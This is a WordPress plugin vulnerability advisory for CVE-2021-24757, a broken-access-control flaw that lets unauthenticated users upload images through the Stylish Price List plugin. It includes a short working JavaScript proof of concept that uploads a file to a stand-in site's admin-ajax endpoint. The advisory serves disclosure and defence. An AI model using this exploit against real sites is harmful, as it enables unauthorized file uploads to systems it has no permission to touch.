WordPress Plugin Vulnerabilities

Stylish Price List < 6.9.0 - Unauthenticated Arbitrary Image Upload

Description

The plugin does not perform capability checks in its spl_upload_ser_img AJAX action (available to both unauthenticated and authenticated users), which could allow unauthenticated users to upload images.

v6.9.0 removed the unauthenticated hook, however, no capability and CSRF checks were implemented, still allowing the issue to be exploited by any authenticated user. A separate advisory has been created for it

Proof of Concept

fetch("https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg").then(r=>r.blob()).then(b=>{const p = new FormData();
p.set("action","spl_upload_ser_img");
p.set("file",new File([b],"hacked.jpg",{type:"image/jpeg"}));
fetch("https://example.com/wp-admin/admin-ajax.php",{method:"POST",body:p});
})

The uploaded file will be at https://example.com/wp-content/uploads/2021/09/hacked.jpg

Affects Plugins

Plugin icon
stylish-price-list
Fixed in 6.9.0

References

CVE
CVE-2021-24757

Classification

Type
INCORRECT AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-863
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
352a9e05-2d5f-4bf7-8da9-85621fb15d91

Timeline

Publicly Published
2021-09-29 (about 2 years ago)
Added
2021-09-29 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other

Published
Title
Published
2023-03-10
Title
GiveWP < 2.25.2 - Contributor+ Arbitrary Content Deletion
Published
2024-03-01
Title
WP Show Posts < 1.1.5 - Information Exposure
Published
2021-09-29
Title
Stylish Price List < 6.9.1 - Subscriber+ Arbitrary Image Upload
Published
2024-02-03
Title
WP Hotel Booking < 2.0.9.3 - Improper Authorization on Multiple REST API Routes
Published
2024-01-29
Title
Avada < 7.11.2 - Contributor+ SSRF